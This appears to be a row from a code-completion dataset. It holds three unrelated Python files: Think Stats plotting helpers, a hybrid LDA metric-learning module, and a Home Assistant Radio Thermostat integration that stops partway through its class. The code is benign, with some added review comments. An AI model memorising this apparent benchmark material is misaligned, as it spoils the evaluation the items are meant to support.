gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
"""This file contains code for use with "Think Stats",
by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function
import logging
import math
import matplotlib
import matplotlib.pyplot as pyplot
import numpy as np
import pandas
# customize some matplotlib attributes
#matplotlib.rc('figure', figsize=(4, 3))
#matplotlib.rc('font', size=14.0)
#matplotlib.rc('axes', labelsize=22.0, titlesize=22.0)
#matplotlib.rc('legend', fontsize=20.0)
#matplotlib.rc('xtick.major', size=6.0)
#matplotlib.rc('xtick.minor', size=3.0)
#matplotlib.rc('ytick.major', size=6.0)
#matplotlib.rc('ytick.minor', size=3.0)
class _Brewer(object):
"""Encapsulates a nice sequence of colors.
Shades of blue that look good in color and can be distinguished
in grayscale (up to a point).
Borrowed from http://colorbrewer2.org/
"""
color_iter = None
colors = ['#081D58',
'#253494',
'#225EA8',
'#1D91C0',
'#41B6C4',
'#7FCDBB',
'#C7E9B4',
'#EDF8B1',
'#FFFFD9']
# lists that indicate which colors to use depending on how many are used
which_colors = [[],
[1],
[1, 3],
[0, 2, 4],
[0, 2, 4, 6],
[0, 2, 3, 5, 6],
[0, 2, 3, 4, 5, 6],
[0, 1, 2, 3, 4, 5, 6],
]
@classmethod
def Colors(cls):
"""Returns the list of colors.
"""
return cls.colors
@classmethod
def ColorGenerator(cls, n):
"""Returns an iterator of color strings.
n: how many colors will be used
"""
for i in cls.which_colors[n]:
yield cls.colors[i]
raise StopIteration('Ran out of colors in _Brewer.ColorGenerator')
@classmethod
def InitializeIter(cls, num):
"""Initializes the color iterator with the given number of colors."""
cls.color_iter = cls.ColorGenerator(num)
@classmethod
def ClearIter(cls):
"""Sets the color iterator to None."""
cls.color_iter = None
@classmethod
def GetIter(cls):
"""Gets the color iterator."""
if cls.color_iter is None:
cls.InitializeIter(7)
return cls.color_iter
def PrePlot(num=None, rows=None, cols=None):
    """Takes hints about what's coming.

    num: number of lines that will be plotted
    rows: number of rows of subplots
    cols: number of columns of subplots
    """
    if num:
        _Brewer.InitializeIter(num)
    if rows is None and cols is None:
        return
    # if only one of rows/cols is given, default the other to 1
    if rows is not None and cols is None:
        cols = 1
    if cols is not None and rows is None:
        rows = 1
    # resize the image, depending on the number of rows and cols
    size_map = {(1, 1): (8, 6),
                (1, 2): (14, 6),
                (1, 3): (14, 6),
                (2, 2): (10, 10),
                (2, 3): (16, 10),
                (3, 1): (8, 10),
                }
    if (rows, cols) in size_map:
        fig = pyplot.gcf()
        fig.set_size_inches(*size_map[rows, cols])
    # create the first subplot and remember the layout so that
    # SubPlot() can default to it later
    if rows > 1 or cols > 1:
        pyplot.subplot(rows, cols, 1)
        global SUBPLOT_ROWS, SUBPLOT_COLS
        SUBPLOT_ROWS = rows
        SUBPLOT_COLS = cols
def SubPlot(plot_number, rows=None, cols=None):
    """Configures the number of subplots and changes the current plot.

    rows: int
    cols: int
    plot_number: int
    """
    # fall back on the layout recorded by PrePlot (module globals)
    rows = rows or SUBPLOT_ROWS
    cols = cols or SUBPLOT_COLS
    pyplot.subplot(rows, cols, plot_number)
def _Underride(d, **options):
"""Add key-value pairs to d only if key is not in d.
If d is None, create a new dictionary.
d: dictionary
options: keyword args to add to d
"""
if d is None:
d = {}
for key, val in options.items():
d.setdefault(key, val)
return d
def Clf():
    """Clears the figure and any hints that have been set."""
    _Brewer.ClearIter()
    pyplot.clf()
    # restore the default figure size
    fig = pyplot.gcf()
    fig.set_size_inches(8, 6)
def Figure(**options):
    """Sets options for the current figure.

    options: keyword args passed to pyplot.figure
    """
    _Underride(options, figsize=(6, 8))
    pyplot.figure(**options)
def _UnderrideColor(options):
    """Fills in the 'color' option with the next Brewer color, if unset.

    options: keyword args dict, mutated in place

    Returns: options
    """
    if 'color' in options:
        return options
    # get the next color from the shared Brewer iterator
    color_iter = _Brewer.GetIter()
    if color_iter:
        try:
            options['color'] = next(color_iter)
        except StopIteration:
            # out of colors: warn and reset so the next call starts over
            print('Warning: Brewer ran out of colors.')
            _Brewer.ClearIter()
    return options
def Plot(obj, ys=None, style='', **options):
    """Plots a line.

    Args:
      obj: sequence of x values, or Series, or anything with Render()
      ys: sequence of y values
      style: style string passed along to pyplot.plot
      options: keyword args passed to pyplot.plot
    """
    options = _UnderrideColor(options)
    label = getattr(obj, 'label', '_nolegend_')
    options = _Underride(options, linewidth=3, alpha=0.8, label=label)
    xs = obj
    if ys is None:
        # obj alone may carry both coordinates
        if hasattr(obj, 'Render'):
            xs, ys = obj.Render()
        if isinstance(obj, pandas.Series):
            ys = obj.values
            xs = obj.index
    if ys is None:
        pyplot.plot(xs, style, **options)
    else:
        pyplot.plot(xs, ys, style, **options)
def FillBetween(xs, y1, y2=None, where=None, **options):
    """Fills the space between two lines.

    Args:
      xs: sequence of x values
      y1: sequence of y values
      y2: sequence of y values
      where: sequence of boolean
      options: keyword args passed to pyplot.fill_between
    """
    options = _UnderrideColor(options)
    options = _Underride(options, linewidth=0, alpha=0.5)
    pyplot.fill_between(xs, y1, y2, where, **options)
def Bar(xs, ys, **options):
    """Plots a bar chart.

    Args:
      xs: sequence of x values
      ys: sequence of y values
      options: keyword args passed to pyplot.bar
    """
    options = _UnderrideColor(options)
    options = _Underride(options, linewidth=0, alpha=0.6)
    pyplot.bar(xs, ys, **options)
def Scatter(xs, ys=None, **options):
    """Makes a scatter plot.

    xs: x values (or a pandas Series carrying both coordinates)
    ys: y values
    options: options passed to pyplot.scatter
    """
    options = _Underride(options, color='blue', alpha=0.2,
                         s=30, edgecolors='none')
    # a lone Series supplies index as x and values as y
    if ys is None and isinstance(xs, pandas.Series):
        ys = xs.values
        xs = xs.index
    pyplot.scatter(xs, ys, **options)
def HexBin(xs, ys, **options):
    """Makes a hexbin plot.

    xs: x values
    ys: y values
    options: options passed to pyplot.hexbin
    """
    options = _Underride(options, cmap=matplotlib.cm.Blues)
    pyplot.hexbin(xs, ys, **options)
def Pdf(pdf, **options):
    """Plots a Pdf, Pmf, or Hist as a line.

    Args:
      pdf: Pdf, Pmf, or Hist object
      options: keyword args passed to pyplot.plot
    """
    # low/high/n are consumed here; the rest go through to pyplot.plot
    low, high = options.pop('low', None), options.pop('high', None)
    n = options.pop('n', 101)
    xs, ps = pdf.Render(low=low, high=high, n=n)
    options = _Underride(options, label=pdf.label)
    Plot(xs, ps, **options)
def Pdfs(pdfs, **options):
    """Plots a sequence of PDFs.

    Options are passed along for all PDFs.  If you want different
    options for each pdf, make multiple calls to Pdf.

    Args:
      pdfs: sequence of PDF objects
      options: keyword args passed to pyplot.plot
    """
    for one_pdf in pdfs:
        Pdf(one_pdf, **options)
def Hist(hist, **options):
    """Plots a Pmf or Hist with a bar plot.

    The default width of the bars is based on the minimum difference
    between values in the Hist.  If that's too small, you can override
    it by providing a width keyword argument, in the same units
    as the values.

    Args:
      hist: Hist or Pmf object
      options: keyword args passed to pyplot.bar
    """
    # find the minimum distance between adjacent values
    xs, ys = hist.Render()
    if 'width' not in options:
        try:
            options['width'] = 0.9 * np.diff(xs).min()
        except TypeError:
            # NOTE(review): if this fires, 'width' stays unset and
            # pyplot.bar falls back on its own default width.
            logging.warning("Hist: Can't compute bar width automatically."
                            "Check for non-numeric types in Hist."
                            "Or try providing width option."
                            )
    options = _Underride(options, label=hist.label)
    options = _Underride(options, align='center')
    # translate left/right alignment into matplotlib's 'edge' convention;
    # a negative width makes the bar extend to the left of x
    if options['align'] == 'left':
        options['align'] = 'edge'
    elif options['align'] == 'right':
        options['align'] = 'edge'
        options['width'] *= -1
    Bar(xs, ys, **options)
def Hists(hists, **options):
    """Plots two histograms as interleaved bar plots.

    Options are passed along for all PMFs.  If you want different
    options for each pmf, make multiple calls to Pmf.

    Args:
      hists: list of two Hist or Pmf objects
      options: keyword args passed to pyplot.plot
    """
    for one_hist in hists:
        Hist(one_hist, **options)
def Pmf(pmf, **options):
    """Plots a Pmf or Hist as a line.

    Args:
      pmf: Hist or Pmf object
      options: keyword args passed to pyplot.plot
    """
    xs, ys = pmf.Render()
    # NOTE(review): low/high are computed but never used below
    low, high = min(xs), max(xs)
    width = options.pop('width', None)
    if width is None:
        try:
            width = np.diff(xs).min()
        except TypeError:
            # NOTE(review): if this fires, width stays None and the
            # x+width arithmetic below will raise; provide width explicitly
            logging.warning("Pmf: Can't compute bar width automatically."
                            "Check for non-numeric types in Pmf."
                            "Or try providing width option.")
    # build the outline of a step function: a flat segment of height y
    # over [x, x+width], dropping to 0 across any gap between values
    points = []
    lastx = np.nan
    lasty = 0
    for x, y in zip(xs, ys):
        if (x - lastx) > 1e-5:
            # gap between the previous bar and this one: drop to zero
            points.append((lastx, 0))
            points.append((x, 0))
        points.append((x, lasty))
        points.append((x, y))
        points.append((x+width, y))
        lastx = x + width
        lasty = y
    points.append((lastx, 0))
    pxs, pys = zip(*points)
    # shift the outline to reflect the requested bar alignment
    align = options.pop('align', 'center')
    if align == 'center':
        pxs = np.array(pxs) - width/2.0
    if align == 'right':
        pxs = np.array(pxs) - width
    options = _Underride(options, label=pmf.label)
    Plot(pxs, pys, **options)
def Pmfs(pmfs, **options):
    """Plots a sequence of PMFs.

    Options are passed along for all PMFs.  If you want different
    options for each pmf, make multiple calls to Pmf.

    Args:
      pmfs: sequence of PMF objects
      options: keyword args passed to pyplot.plot
    """
    for one_pmf in pmfs:
        Pmf(one_pmf, **options)
def Diff(t):
    """Compute the differences between adjacent elements in a sequence.

    Args:
        t: sequence of numbers

    Returns:
        list of differences (length one less than t)
    """
    return [succ - prev for prev, succ in zip(t, t[1:])]
def Cdf(cdf, complement=False, transform=None, **options):
    """Plots a CDF as a line.

    Args:
      cdf: Cdf object
      complement: boolean, whether to plot the complementary CDF
      transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel'
      options: keyword args passed to pyplot.plot

    Returns:
      dictionary with the scale options that should be passed to
      Config, Show or Save.
    """
    xs, ps = cdf.Render()
    xs = np.asarray(xs)
    ps = np.asarray(ps)
    scale = dict(xscale='linear', yscale='linear')
    # explicit scale options take precedence over the transform defaults
    for s in ['xscale', 'yscale']:
        if s in options:
            scale[s] = options.pop(s)
    if transform == 'exponential':
        complement = True
        scale['yscale'] = 'log'
    if transform == 'pareto':
        complement = True
        scale['yscale'] = 'log'
        scale['xscale'] = 'log'
    if complement:
        ps = [1.0-p for p in ps]
    if transform == 'weibull':
        # drop the last point, where log(1-p) is undefined
        xs = np.delete(xs, -1)
        ps = np.delete(ps, -1)
        ps = [-math.log(1.0-p) for p in ps]
        scale['xscale'] = 'log'
        scale['yscale'] = 'log'
    if transform == 'gumbel':
        # drop the first point, where log(p) is undefined
        # BUG FIX: original read `xp.delete` -- a typo for `np.delete`
        # that raised NameError whenever the gumbel transform was used.
        xs = np.delete(xs, 0)
        ps = np.delete(ps, 0)
        ps = [-math.log(p) for p in ps]
        scale['yscale'] = 'log'
    options = _Underride(options, label=cdf.label)
    Plot(xs, ps, **options)
    return scale
def Cdfs(cdfs, complement=False, transform=None, **options):
    """Plots a sequence of CDFs.

    cdfs: sequence of CDF objects
    complement: boolean, whether to plot the complementary CDF
    transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel'
    options: keyword args passed to pyplot.plot
    """
    for one_cdf in cdfs:
        Cdf(one_cdf, complement, transform, **options)
def Contour(obj, pcolor=False, contour=True, imshow=False, **options):
    """Makes a contour plot.

    obj: map from (x, y) to z, or object that provides GetDict
    pcolor: boolean, whether to make a pseudocolor plot
    contour: boolean, whether to make a contour plot
    imshow: boolean, whether to use pyplot.imshow
    options: keyword args passed to pyplot.pcolor and/or pyplot.contour
    """
    try:
        d = obj.GetDict()
    except AttributeError:
        d = obj
    _Underride(options, linewidth=3, cmap=matplotlib.cm.Blues)
    # build a dense grid from the sparse (x, y) -> z mapping;
    # missing cells default to 0
    xs, ys = zip(*d.keys())
    xs = sorted(set(xs))
    ys = sorted(set(ys))
    X, Y = np.meshgrid(xs, ys)
    func = lambda x, y: d.get((x, y), 0)
    func = np.vectorize(func)
    Z = func(X, Y)
    # keep full x tick labels (no offset notation)
    x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False)
    axes = pyplot.gca()
    axes.xaxis.set_major_formatter(x_formatter)
    if pcolor:
        pyplot.pcolormesh(X, Y, Z, **options)
    if contour:
        cs = pyplot.contour(X, Y, Z, **options)
        pyplot.clabel(cs, inline=1, fontsize=10)
    if imshow:
        extent = xs[0], xs[-1], ys[0], ys[-1]
        pyplot.imshow(Z, extent=extent, **options)
def Pcolor(xs, ys, zs, pcolor=True, contour=False, **options):
    """Makes a pseudocolor plot.

    xs: sequence of x values
    ys: sequence of y values
    zs: 2-D array of z values
    pcolor: boolean, whether to make a pseudocolor plot
    contour: boolean, whether to make a contour plot
    options: keyword args passed to pyplot.pcolor and/or pyplot.contour
    """
    _Underride(options, linewidth=3, cmap=matplotlib.cm.Blues)
    X, Y = np.meshgrid(xs, ys)
    Z = zs
    # keep full x tick labels (no offset notation)
    x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False)
    axes = pyplot.gca()
    axes.xaxis.set_major_formatter(x_formatter)
    if pcolor:
        pyplot.pcolormesh(X, Y, Z, **options)
    if contour:
        cs = pyplot.contour(X, Y, Z, **options)
        pyplot.clabel(cs, inline=1, fontsize=10)
def Text(x, y, s, **options):
    """Puts text in a figure.

    x: number
    y: number
    s: string
    options: keyword args passed to pyplot.text
    """
    options = _Underride(options, verticalalignment='top',
                         horizontalalignment='left')
    pyplot.text(x, y, s, **options)
def Config(**options):
    """Configures the plot.

    Pulls options out of the option dictionary and passes them to
    the corresponding pyplot functions.
    """
    names = ['title', 'xlabel', 'ylabel', 'xscale', 'yscale',
             'xticks', 'yticks', 'axis', 'xlim', 'ylim']
    for name in names:
        if name in options:
            getattr(pyplot, name)(options[name])
    # looks like this is not necessary: matplotlib understands text loc specs
    # NOTE(review): loc_dict is currently unused (see commented lookup below)
    loc_dict = {'upper right': 1,
                'upper left': 2,
                'lower left': 3,
                'lower right': 4,
                'right': 5,
                'center left': 6,
                'center right': 7,
                'lower center': 8,
                'upper center': 9,
                'center': 10,
                }
    loc = options.get('loc', 0)
    #loc = loc_dict.get(loc, loc)
    legend = options.get('legend', True)
    if legend:
        pyplot.legend(loc=loc)
def Show(**options):
    """Shows the plot.

    For options, see Config.

    options: keyword args used to invoke various pyplot functions
    """
    # 'clf' controls whether the figure is cleared after showing
    clf = options.pop('clf', True)
    Config(**options)
    pyplot.show()
    if clf:
        Clf()
def Plotly(**options):
    """Uploads the current figure to plotly and returns its URL.

    For options, see Config.

    options: keyword args used to invoke various pyplot functions
    """
    clf = options.pop('clf', True)
    Config(**options)
    # imported lazily so plotly is only required when this is used
    import plotly.plotly as plotly
    url = plotly.plot_mpl(pyplot.gcf())
    if clf:
        Clf()
    return url
def Save(root=None, formats=None, **options):
    """Saves the plot in the given formats and clears the figure.

    For options, see Config.

    Args:
      root: string filename root
      formats: list of string formats
      options: keyword args used to invoke various pyplot functions
    """
    clf = options.pop('clf', True)
    Config(**options)
    if formats is None:
        formats = ['pdf', 'eps']
    # 'plotly' is not a savefig format; handle it separately
    try:
        formats.remove('plotly')
        Plotly(clf=False)
    except ValueError:
        pass
    if root:
        for fmt in formats:
            SaveFormat(root, fmt)
    if clf:
        Clf()
def SaveFormat(root, fmt='eps'):
    """Writes the current figure to a file in the given format.

    Args:
      root: string filename root
      fmt: string format
    """
    filename = '%s.%s' % (root, fmt)
    print('Writing', filename)
    pyplot.savefig(filename, format=fmt, dpi=300)
# provide aliases for calling functions with lower-case names
preplot = PrePlot
subplot = SubPlot
clf = Clf
figure = Figure
plot = Plot
scatter = Scatter
pmf = Pmf
pmfs = Pmfs
hist = Hist
hists = Hists
diff = Diff
cdf = Cdf
cdfs = Cdfs
contour = Contour
pcolor = Pcolor
config = Config
show = Show
save = Save
def main():
    # demo: print the 7-color Brewer sequence
    color_iter = _Brewer.ColorGenerator(7)
    for color in color_iter:
        print(color)


if __name__ == '__main__':
    main()
|
|
# hybrid_lda.py
# Implementation of LDA-based hybrid metric learning
# Author: Brian D. Bue (bbue@rice.edu)
# Last modified: 5/14/12
#
# If you use this code in a publication, please cite the following paper:
# B. Bue and E. Merenyi, "An Adaptive Similarity Measure for Classification
# of Hyperspectral Signatures," IEEE Geoscience and Remote Sensing
# Letters, 2012.
#
# Copyright: 2010-2012 Rice University
from aux import *
def solveLDA(B, W, k, lambdav=0.0, convex=False):
    r'''
    Calculates matrix A maximizing regularized LDA objective

    Arguments:
    - B: D x D between class scatter matrix
    - W: D x D within class scatter matrix
    - k: rank of LDA solution

    Keyword arguments:
    - lambdav: regularization parameter \in [0,1]
    - convex: if true and k==1, return convex vector of A coefficients

    Returns:
    - A: D x k LDA transformation matrix
    '''
    from numpy.linalg import eig, inv
    from numpy import asmatrix, argsort, eye, sum

    B = asmatrix(B)
    # shrinkage regularization: blend W toward the identity
    W = asmatrix((1-lambdav)*W + lambdav*eye(W.shape[0]))
    # generalized eigenproblem: maximize tr(A'BA)/tr(A'WA)
    eigvals, eigvecs = eig(inv(W)*B)
    # keep the eigenvectors of the k largest eigenvalues
    maxi = argsort(eigvals)[-k:]
    A = eigvecs[:, maxi]
    if convex:
        if k == 1:
            A /= sum(A)  # convex-ify solution: coefficients sum to 1
        else:
            # BUG FIX: the original used Python-2-only print statements,
            # which are syntax errors on Python 3; a single-string call
            # works identically on both interpreters.
            print('Error: can only convex-ify top eigenvector, '
                  'returning nonconvex solution')
    return A
def alphaLDA(X, labels, lambdav=0.0, metrics=['SqEuclidean']):
    r'''
    LDA-based hybrid metric learning.

    Arguments:
    - X: list of D representations of samples, each X[i] an n x d matrix
    - labels: list of n labels for each sample in X[i]

    Keyword arguments:
    - lambdav: regularization parameter \in [0,1]
    - metrics: list of 1 or D metric types for each representation
      see scipy.spatial.distance.cdist docs for possible types

    Returns:
    - A: \alpha coefficients
    '''
    # `sum` is imported explicitly: builtin sum over 2-D arrays sums
    # along axis 0 instead of reducing to a scalar
    from numpy import asarray, zeros, sum

    if lambdav < 0 or lambdav > 1:
        print("Error: lambdav must be in [0,1] range")
        exit()

    D = len(X)
    ulab = unique(labels)
    k = len(ulab)
    N = len(labels)
    Ni = classCounts(labels)

    # NOTE(review): for D == 1 the j-loop below never runs, so B and W
    # stay all-zero -- confirm callers always pass D >= 2.
    B = zeros([D, D])
    W = zeros([D, D])

    # a single metric applies to every representation
    if len(metrics) == 1:
        metrics = [metrics[0]]*D

    for i in range(D):
        Xi = X[i]
        Mi = classMeans(Xi, labels)
        Mui = vecmean(Mi)
        for j in range(i+1, D):
            Xj = X[j]
            Mj = classMeans(Xj, labels)
            Muj = vecmean(Mj)

            # calculate within-class scatter
            Wii, Wij, Wjj = 0, 0, 0
            for l in range(k):
                maskl = labels == ulab[l]
                Wdisti = distanceMatrix(Xi[maskl], Mi[l], metric=metrics[i])
                # BUG FIX: distances in representation j used metrics[i];
                # they must use representation j's own metric
                Wdistj = distanceMatrix(Xj[maskl], Mj[l], metric=metrics[j])
                Wii += sum(Wdisti**2)
                Wjj += sum(Wdistj**2)
                Wij += sum(Wdisti*Wdistj)

            # calculate between-class scatter (class counts as weights)
            Bdisti = distanceMatrix(Mi, Mui, metric=metrics[i])
            # BUG FIX: same metrics[i] -> metrics[j] copy-paste error
            Bdistj = distanceMatrix(Mj, Muj, metric=metrics[j])
            Bii = sum(Ni*(Bdisti**2))
            Bjj = sum(Ni*(Bdistj**2))
            Bij = sum(Ni*(Bdisti*Bdistj))

            W[i, j] = W[j, i] = Wij
            B[i, j] = B[j, i] = Bij
            W[i, i], W[j, j] = Wii, Wjj
            B[i, i], B[j, j] = Bii, Bjj

    B /= N
    W /= N
    # rank-1 convex solution gives the alpha weight vector
    A = solveLDA(B, W, 1, lambdav, convex=True)
    return asarray(A).flatten()
def minDistHybrid(X, lab, lambdas=[0], Dlab=[], verbose=False, norm='none'):
    r'''
    Hybrid metric learning with minimum distance to class means classifier.
    Learns the LDA-based weight vector \alpha to combine distances
    between D representations of samples X.

    Arguments:
    - X: list of samples in D representations, each X[i] is an n x d matrix
    - lab: n dimensional vector of labels for each sample in X

    Keyword arguments:
    - lambdas: list of lambda-values for regularization, default=[0]
      (no regularization); the best lambda value is selected from this
      list according to its performance on the training set.
    - verbose: print verbose output, default=False
    - Dlab: list of string labels for each of the D representations
    - norm: normalization type ('none', 'L2' or 'std')
    '''
    from numpy import min, max, zeros, ones

    D = len(X)
    metrics = ['SqEuclidean']*D  # base metrics for each representation

    if len(Dlab) != D:
        Dlab = ['X%d' % i for i in range(D)]

    # 50/50 stratified training/test split
    tridx, teidx = stratSplit(lab, splitp=0.5)
    trlab, telab, ulab = lab[tridx], lab[teidx], unique(lab)
    trXN = [Xi[tridx] for Xi in X]
    teXN = [Xi[teidx] for Xi in X]

    # normalize each sample in each representation
    if norm == 'L2':  # ...by euclidean norm
        trXN = [eucRowNorm(trXi) for trXi in trXN]
        teXN = [eucRowNorm(teXi) for teXi in teXN]
    elif norm == 'std':  # ...by std. dev. of each representation
        from numpy import std
        vars = [std(Xi.flatten()) for Xi in X]
        trXN = [trXi/vari for trXi, vari in zip(trXN, vars)]
        teXN = [teXi/vari for teXi, vari in zip(teXN, vars)]

    # training class means (per representation)
    trXNmu = [classMeans(trXNi, trlab) for trXNi in trXN]

    # distance matrices to training means in each representation
    trXNdmats = [distanceMatrix(trXN[i], trXNmu[i], metric=metrics[i])
                 for i in range(D)]
    teXNdmats = [distanceMatrix(teXN[i], trXNmu[i], metric=metrics[i])
                 for i in range(D)]

    bestalpha, bestlambda = ones(D)/D, -1
    trmaxacc = -1.0
    temaxacc = -1.0  # BUG FIX: test accuracy of the best model was never stored
    for lambdav in lambdas:
        alpha = alphaLDA(trXN, trlab, lambdav, metrics=metrics)
        if min(alpha) < 0 or max(alpha) > 1:  # ill-posed eigendecomposition
            continue

        # accumulate distance matrices for train/test points, weighted by alpha
        trHybrid_dmat = zeros(trXNdmats[0].shape)
        teHybrid_dmat = zeros(teXNdmats[0].shape)
        for i, a in enumerate(alpha):
            trHybrid_dmat += a*trXNdmats[i]
            teHybrid_dmat += a*teXNdmats[i]

        trpred = minDist(trHybrid_dmat, ulab)
        tepred = minDist(teHybrid_dmat, ulab)
        tracc = accuracy(trlab, trpred)
        teacc = accuracy(telab, tepred)
        if verbose:
            # single-string print works on both Python 2 and 3
            print('lambda= %s alpha= %s Tr hybrid acc= %s Te hybrid acc= %s'
                  % (lambdav, alpha, tracc, teacc))
        # model selection: keep the lambda with best TRAINING accuracy
        if tracc > trmaxacc:
            trmaxacc = tracc
            temaxacc = teacc
            bestalpha, bestlambda = alpha, lambdav

    if trmaxacc < 0:
        print('Error: Could not determine a viable solution with provided '
              'data and regularization parameters')
        return

    # per-representation baselines vs. the hybrid metric, one line each
    trparts = ['Tr '+Dlab[i]+' acc=%0.3f' % accuracy(trlab,
                                                     minDist(XNdmati, ulab))
               for i, XNdmati in enumerate(trXNdmats)]
    print(' '.join(trparts + ['Tr hybrid acc=%0.3f' % trmaxacc]))
    teparts = ['Te '+Dlab[i]+' acc=%0.3f' % accuracy(telab,
                                                     minDist(XNdmati, ulab))
               for i, XNdmati in enumerate(teXNdmats)]
    # BUG FIX: the original referenced `temaxacc` without ever assigning
    # it (NameError); it is now tracked alongside trmaxacc above
    print(' '.join(teparts + ['Te hybrid acc=%0.3f' % temaxacc]))
    print('best alpha= %s best lambda= %s' % (bestalpha, bestlambda))
|
|
"""Support for Radio Thermostat wifi-enabled home thermostats."""
import logging
from socket import timeout
import radiotherm
import voluptuous as vol
from homeassistant.components.climate import PLATFORM_SCHEMA, ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_COOL,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_OFF,
FAN_ON,
HVAC_MODE_AUTO,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_HOME,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
CONF_HOST,
PRECISION_HALVES,
STATE_ON,
TEMP_FAHRENHEIT,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.util import dt as dt_util
_LOGGER = logging.getLogger(__name__)

ATTR_FAN_ACTION = "fan_action"

CONF_HOLD_TEMP = "hold_temp"

PRESET_HOLIDAY = "holiday"
PRESET_ALTERNATE = "alternate"

STATE_CIRCULATE = "circulate"

PRESET_MODES = [PRESET_HOME, PRESET_ALTERNATE, PRESET_AWAY, PRESET_HOLIDAY]
OPERATION_LIST = [HVAC_MODE_AUTO, HVAC_MODE_COOL, HVAC_MODE_HEAT, HVAC_MODE_OFF]
CT30_FAN_OPERATION_LIST = [STATE_ON, HVAC_MODE_AUTO]
# circulate mode is only available on CT80 models
CT80_FAN_OPERATION_LIST = [STATE_ON, STATE_CIRCULATE, HVAC_MODE_AUTO]

# Mappings from radiotherm json data codes to and from Home Assistant state
# flags.  CODE is the thermostat integer code and these map to and
# from Home Assistant state flags.

# Programmed temperature mode of the thermostat.
CODE_TO_TEMP_MODE = {
    0: HVAC_MODE_OFF,
    1: HVAC_MODE_HEAT,
    2: HVAC_MODE_COOL,
    3: HVAC_MODE_AUTO,
}
TEMP_MODE_TO_CODE = {v: k for k, v in CODE_TO_TEMP_MODE.items()}

# Programmed fan mode (circulate is supported by CT80 models)
CODE_TO_FAN_MODE = {0: HVAC_MODE_AUTO, 1: STATE_CIRCULATE, 2: STATE_ON}
FAN_MODE_TO_CODE = {v: k for k, v in CODE_TO_FAN_MODE.items()}

# Active thermostat state (is it heating or cooling?).  In the future
# this should probably made into heat and cool binary sensors.
CODE_TO_TEMP_STATE = {0: CURRENT_HVAC_IDLE, 1: CURRENT_HVAC_HEAT, 2: CURRENT_HVAC_COOL}

# Active fan state.  This is if the fan is actually on or not.  In the
# future this should probably made into a binary sensor for the fan.
CODE_TO_FAN_STATE = {0: FAN_OFF, 1: FAN_ON}

PRESET_MODE_TO_CODE = {"home": 0, "alternate": 1, "away": 2, "holiday": 3}
CODE_TO_PRESET_MODE = {0: "home", 1: "alternate", 2: "away", 3: "holiday"}

# 0 = following the program schedule, 1 = holding the current setpoint
CODE_TO_HOLD_STATE = {0: False, 1: True}
def round_temp(temperature):
    """Round a temperature to the resolution of the thermostat.

    RadioThermostats can handle 0.5 degree temps so the input
    temperature is rounded to that value and returned.
    """
    half_degree_units = round(temperature * 2.0)
    return half_degree_units / 2.0
# Platform config: optional list of thermostat hosts plus a hold-temp flag;
# when no host is given, discovery is attempted in setup_platform.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Optional(CONF_HOST): vol.All(cv.ensure_list, [cv.string]),
        vol.Optional(CONF_HOLD_TEMP, default=False): cv.boolean,
    }
)

SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_FAN_MODE | SUPPORT_PRESET_MODE
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the Radio Thermostat."""
    hosts = []
    if CONF_HOST in config:
        hosts = config[CONF_HOST]
    else:
        hosts.append(radiotherm.discover.discover_address())
    # NOTE(review): `hosts` is always a list here, so this check never
    # fires; it was presumably meant to catch discover_address()
    # returning None -- confirm against radiotherm.discover behavior.
    if hosts is None:
        _LOGGER.error("No Radiotherm Thermostats detected")
        return False
    hold_temp = config.get(CONF_HOLD_TEMP)
    tstats = []
    for host in hosts:
        try:
            tstat = radiotherm.get_thermostat(host)
            tstats.append(RadioThermostat(tstat, hold_temp))
        except OSError:
            _LOGGER.exception("Unable to connect to Radio Thermostat: %s", host)
    add_entities(tstats, True)
class RadioThermostat(ClimateEntity):
    """Representation of a Radio Thermostat."""

    def __init__(self, device, hold_temp):
        """Initialize the thermostat."""
        self.device = device
        self._target_temperature = None
        self._current_temperature = None
        self._current_humidity = None
        self._current_operation = HVAC_MODE_OFF
        self._name = None
        self._fmode = None
        self._fstate = None
        self._tmode = None
        self._tstate = None
        self._hold_temp = hold_temp
        self._hold_set = False
        self._prev_temp = None
        self._preset_mode = None
        self._program_mode = None
        self._is_away = False
        # Fan circulate mode is only supported by the CT80 models.
        self._is_model_ct80 = isinstance(self.device, radiotherm.thermostat.CT80)

    @property
    def supported_features(self):
        """Return the list of supported features."""
        return SUPPORT_FLAGS

    async def async_added_to_hass(self):
        """Register callbacks."""
        # Set the time on the device.  This shouldn't be in the
        # constructor because it's a network call.  We can't put it in
        # update() because calling it will clear any temporary mode or
        # temperature in the thermostat.  So add it as a future job
        # for the event loop to run.
        self.hass.async_add_job(self.set_time)

    @property
    def name(self):
        """Return the name of the Radio Thermostat."""
        return self._name

    @property
    def temperature_unit(self):
        """Return the unit of measurement."""
        return TEMP_FAHRENHEIT

    @property
    def precision(self):
        """Return the precision of the system."""
        return PRECISION_HALVES

    @property
    def extra_state_attributes(self):
        """Return the device specific state attributes."""
        return {ATTR_FAN_ACTION: self._fstate}

    @property
    def fan_modes(self):
        """List of available fan modes."""
        if self._is_model_ct80:
            return CT80_FAN_OPERATION_LIST
        return CT30_FAN_OPERATION_LIST

    @property
    def fan_mode(self):
        """Return whether the fan is on."""
        return self._fmode

    def set_fan_mode(self, fan_mode):
        """Turn fan on/off."""
        code = FAN_MODE_TO_CODE.get(fan_mode)
        if code is not None:
            self.device.fmode = code

    @property
    def current_temperature(self):
        """Return the current temperature."""
        return self._current_temperature

    @property
    def current_humidity(self):
        """Return the current humidity."""
        return self._current_humidity

    @property
    def hvac_mode(self):
        """Return the current operation: heat, cool, or idle."""
        return self._current_operation
